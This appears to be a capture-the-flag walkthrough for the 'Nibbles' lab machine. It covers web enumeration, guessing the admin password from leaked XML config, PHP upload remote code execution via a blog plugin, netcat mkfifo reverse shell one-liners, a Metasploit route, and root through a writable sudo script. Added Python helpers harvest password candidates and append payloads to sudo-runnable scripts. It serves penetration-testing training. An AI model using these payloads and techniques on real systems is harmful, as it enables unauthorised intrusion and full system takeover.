
# Nibbles

## Overview

Enumeration is an iterative process. After the `Nmap` port scans, perform detailed enumeration against every open port based on what is running there. The process for `Nibbles` is:

* Enumeration/Scanning with `Nmap` - perform a quick scan for open ports followed by a full port scan
* Web Footprinting - check any identified web ports for running web applications, and any hidden files/directories. Some useful tools for this phase include `whatweb` and `Gobuster`
* If you identify a website hostname, you can add it to your `/etc/hosts` file with the target IP so the site loads normally, though this is not necessary here.
* After identifying the technologies in use, use a tool such as `Searchsploit` to find public exploits or search on Google for manual exploitation techniques
* After gaining an initial foothold, use the `Python3 pty` trick to upgrade to a pseudo TTY
* Perform manual and automated enumeration of the file system, looking for misconfigurations, services with known vulnerabilities, and sensitive data in cleartext such as credentials
* Organize this data offline to determine the various ways to escalate privileges to root on this target

There are two ways to gain a foothold: one using `Metasploit` and one via a manual process. Challenge yourself to work through and understand both methods.

There are two ways to escalate privileges to root on the target after obtaining a foothold. Make use of helper scripts such as [LinEnum](https://github.com/rebootuser/LinEnum) and [LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) to assist you. Filter through the information searching for two well-known privilege escalation techniques.

## Hacking the Box

Browse to the website first in Firefox.

Check the page source: a comment references a directory named `/nibbleblog/`.

Scan the target with `nmap`.

Use `gobuster` to enumerate directories and file extensions under `/nibbleblog/`.

Work through the directories it finds.

The `/admin.php` is a login page. The source code doesn't reveal anything.

Check the `/content` directory; `/content/private/users.xml` shows that one of the users is `admin`.

`/content/private/config.xml` references `nibbles` (the blog's name) repeatedly, and that word is also the password for the `admin` account.
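As an added example (not part of the original page), the Python below pulls the usernames and blacklist state out of `users.xml` and turns every string value in `config.xml` into an ordered list of password candidates. The two XML samples are constructed to mirror the layout of Nibbleblog's `content/private/` files, with made-up timestamps and the attacker IP `10.10.14.2`; the four-character minimum length is an assumption of this example. The blacklist entries matter: Nibbleblog records failed logins per IP in `users.xml` and blocks an address after repeated failures, so try the harvested words by hand rather than brute-forcing the login form.

```python
"""Harvest usernames and password candidates from Nibbleblog's XML data files."""
import re
from urllib.parse import urlparse
from xml.etree import ElementTree as ET

# Constructed sample modelled on the layout of content/private/users.xml;
# the timestamps and the blacklisted IP are illustrative, not taken from the box.
USERS_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.14.2">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>"""

# Constructed sample modelled on content/private/config.xml.
CONFIG_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <url type="string">http://10.129.42.190/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
</config>"""

MIN_LEN = 4  # assumption: drop very short tokens such as "yum" or "com"


def parse_users(xml_text):
    """Return the usernames declared in users.xml."""
    root = ET.fromstring(xml_text)
    return [u.get("username") for u in root.findall("user") if u.get("username")]


def parse_blacklist(xml_text):
    """Return {ip: fail_count} for addresses the blog has already blacklisted."""
    root = ET.fromstring(xml_text)
    return {b.get("ip"): int(b.findtext("fail_count", "0")) for b in root.findall("blacklist")}


def password_candidates(xml_text):
    """Tokenise every string-typed value in config.xml into lowercase candidates, first seen first."""
    root = ET.fromstring(xml_text)
    seen = []

    def add(word):
        w = word.strip().lower()
        if len(w) >= MIN_LEN and w not in seen:
            seen.append(w)

    for el in root.iter():
        if el.get("type") != "string" or not el.text:
            continue
        text = el.text.strip()
        if "://" in text:  # URL: path segments are often the install name
            for seg in urlparse(text).path.split("/"):
                add(seg)
        elif "@" in text:  # e-mail: local part and domain labels
            local, _, domain = text.partition("@")
            add(local)
            for label in domain.split("."):
                add(label)
        for w in re.findall(r"[A-Za-z0-9]+", text):
            add(w)
    return seen


if __name__ == "__main__":
    print("users:", parse_users(USERS_XML))
    print("blacklisted:", parse_blacklist(USERS_XML))
    print("candidates:", password_candidates(CONFIG_XML))
```

On the real files, point `ET.parse` at the two XML documents fetched with `curl` instead of the embedded samples; the candidate list is what you try against `/admin.php`, and the blacklist tells you whether your own address has already accumulated failures.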

Signing into the `/admin.php` with the credentials above gives a bit more access.

Under the Plugins tab, open the `My Image` plugin and use its upload form to upload a `.php` file.

```php
<?php system('id'); ?>
```

Create a new `.php` file with the code above; it simply tests for code execution.

Upload the file and save the changes. The upload produces several PHP warnings, but the file is stored anyway.

We need to figure out where the file was uploaded.

In the `/content` directory there is a `plugins` directory and another sub-directory for `my_image`.

`http://<host>/nibbleblog/content/private/plugins/my_image/`

The plugin saves the upload as `image.php` (it renames the file but keeps the extension). Request it with `curl` to check for command execution:

```shell-session
curl http://10.129.42.190/nibbleblog/content/private/plugins/my_image/image.php

uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
```

If the `uid=1001(nibbler)` line comes back, the PHP executed on the server and you have remote code execution as the `nibbler` user.

Next, modify the PHP file to obtain a reverse shell. Put the following Bash reverse shell one-liner into the PHP script, replacing `[ATTACKING_IP]` with your tun0 address and `[LISTENING_PORT]` with the port your listener will use:

```php
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ATTACKING_IP] [LISTENING_PORT] >/tmp/f"); ?>
```

Upload the file again the same way, then start a netcat listener on the port you put in the one-liner (9443 here):

```shell-session
nc -lvnp 9443
```

`curl` the image page again (as above) or browse to it in Firefox at `http://<host>/nibbleblog/content/private/plugins/my_image/image.php` to execute the reverse shell.

`curl` worked more reliably than the browser for me. Either way, you should now have a reverse shell.

Before moving on to further enumeration, upgrade to a "nicer" shell. The shell we caught is not a fully interactive TTY: commands such as `su` will not work, text editors are unusable, and tab completion does not work. The post below explains how to upgrade a reverse shell to a fully interactive TTY.

[Upgrading simple shells to fully interactive TTYs](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)

We will use a Python one-liner to spawn a pseudo-terminal so commands such as `su` and `sudo` will work.

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

This gives a more usable terminal.

Change to `/home/nibbler` and read `user.txt` for the user flag:

`/home/nibbler`

79c03865431abf47b90ef24b9695e148

## Metasploit alternative for gaining access

Start `msfconsole` on your attacking machine and search for a Nibbleblog module:

```shell-session
search nibbleblog
```

Load the first result with `use 0`.

Check the options and set `RHOSTS` (`RHOST` on older Metasploit versions) to the target IP and `LHOST` to your tun0 address.

Set the USERNAME and PASSWORD options as admin:nibbles

Set the TARGETURI to nibbleblog

Next, change the payload to a generic reverse TCP shell:

`generic/shell_reverse_tcp`

Once the exploit completes you will have a shell as the `nibbler` user.

### Privilege escalation

Start by unzipping `personal.zip` in `/home/nibbler`; it extracts `personal/stuff/monitor.sh`:

```shell-session
unzip personal.zip
```

The shell script `monitor.sh` is a system monitoring script, and it is owned by our `nibbler` user and writable. `cat` the file to preview it:

```shell-session
cat monitor.sh
```

Let us put this aside for now and pull in [LinEnum.sh](https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) to perform some automated privilege escalation checks. First, download the script to your attacking VM or the Pwnbox.

Make a directory called `linenum`, `cd` into it, and download the script there:

```
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
```

Then, from that directory on your attacking machine, serve the file with a Python HTTP server (no `sudo` is needed for a port above 1024):

```shell-session
python3 -m http.server 8080
```

On target machine:

`wget http://[HOST_IP]:8080/LinEnum.sh`

On the target machine, make the file executable:

`chmod +x LinEnum.sh`

Run it and wait for it to finish; this takes a while:

`./LinEnum.sh`

The `sudo -l` section of LinEnum's output shows that `nibbler` can run `/home/nibbler/personal/stuff/monitor.sh` as root without a password. Since we have full control over that file, appending a reverse shell one-liner to the end of it and executing it with `sudo` gives a reverse shell as root. Make a backup copy of `monitor.sh` first, then append the one-liner:

```shell-session
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [HOST_IP] 8443 >/tmp/f' | tee -a monitor.sh
```

If we `cat` `monitor.sh`, the line now appears at the end. Whenever a writable file can be leveraged for privilege escalation, only append to it (after making a backup copy) rather than overwriting it, so the original behaviour is not disrupted.
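The check that LinEnum did for us, and the append-with-backup rule just stated, as an added Python example that is not from the original page: it parses `sudo -l` output into rules, flags any permitted program whose file (or parent directory) the current user can write, and appends a payload line only after copying the script aside. The `sudo -l` text is a constructed sample in the usual format, using the script path the page names; `demo()` exercises the whole flow on a throwaway copy in a temporary directory, and the `10.10.14.5:8443` endpoint in it is a placeholder.

```python
"""Spot sudo-permitted programs the current user can modify, then append a payload safely."""
import os
import re
import shutil
import tempfile

# Constructed sample in the shape of `sudo -l` output on the box; the script path
# is the one the page names, the rest is illustrative.
SUDO_L = """Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# One sudoers rule line: "(runas) [NOPASSWD:] cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:)?\s*(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            entries.append((m.group("runas"), bool(m.group("nopasswd")), cmd.strip()))
    return entries


def writable_sudo_targets(entries):
    """Return (runas, nopasswd, program, reason) for entries we can influence.

    A writable file means we can edit it in place; a writable parent directory
    means we could replace the file even when the file itself is read-only.
    """
    hits = []
    for runas, nopasswd, cmd in entries:
        prog = cmd.split()[0]
        if prog == "ALL":
            hits.append((runas, nopasswd, prog, "any command"))
        elif os.access(prog, os.W_OK):
            hits.append((runas, nopasswd, prog, "file writable"))
        elif os.access(os.path.dirname(prog) or ".", os.W_OK):
            hits.append((runas, nopasswd, prog, "directory writable"))
    return hits


def append_payload(path, payload_line):
    """Back the script up, then append one line; never overwrite the original."""
    backup = path + ".bak"
    shutil.copy2(path, backup)
    with open(path, "rb") as f:
        data = f.read()
    with open(path, "ab") as f:
        if data and not data.endswith(b"\n"):
            f.write(b"\n")  # otherwise the payload would glue onto the last line
        f.write(payload_line.rstrip("\n").encode() + b"\n")
    return backup


def demo():
    """Run the check end to end against a throwaway copy of the box's layout."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "monitor.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho 'monitoring...'")  # no trailing newline, on purpose
    entries = parse_sudo_l(SUDO_L.replace("/home/nibbler/personal/stuff/monitor.sh", script))
    hits = writable_sudo_targets(entries)
    payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 8443 >/tmp/f"
    backup = append_payload(script, payload)
    with open(script) as f:
        lines = f.read().splitlines()
    result = {"hits": [(h[0], h[1], h[3]) for h in hits],
              "backup_ok": os.path.exists(backup),
              "lines": lines}
    shutil.rmtree(tmp)
    return result


if __name__ == "__main__":
    for hit in writable_sudo_targets(parse_sudo_l(SUDO_L)):
        print(hit)
    print(demo())
```

On the target, feed the real `sudo -l` output to `parse_sudo_l` and run `writable_sudo_targets` as `nibbler`; the missing trailing newline handled in `append_payload` is exactly the case where a plain `echo ... >> monitor.sh` would corrupt the last line of the script instead of adding a new one.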

Start a new netcat listener on another terminal:

```shell-session
nc -lvnp 8443
```

Execute the script with `sudo`:

```shell-session
sudo /home/nibbler/personal/stuff/monitor.sh
```

You should now have root privileges on your listening terminal. Read `/root/root.txt` for the final flag.

